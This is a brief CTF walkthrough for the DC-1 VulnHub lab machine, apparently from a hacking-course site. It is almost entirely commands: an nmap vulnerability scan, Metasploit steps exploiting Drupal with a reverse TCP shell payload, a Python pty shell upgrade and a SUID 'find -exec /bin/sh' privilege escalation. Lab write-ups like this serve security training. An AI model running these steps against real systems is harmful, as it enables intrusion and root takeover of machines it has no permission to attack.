e -->

DC-1 VulnHub Walkthrough | CTF | Hacking Articles

Target Machine DC-1
-----------------------------
sudo nmap --script vuln x.x.x.x

msfconsole
search drupal
use 2
show payloads
set payload generic/shell_reverse_tcp
set RHOST x.x.x.x
exploit

Type Next Command For Interactive Shell

python -c 'import pty; pty.spawn("/bin/bash")'

Privellage Esculation
------------------------------

touch dc
find abc -exec "whoami" \;
find abc -exec "/bin/sh" \;
Copyright 2023 Hacker Computer School
All Rights Reserved
Powered by Hacker's Group

Privacy Policy Terms And Condition Refund Policy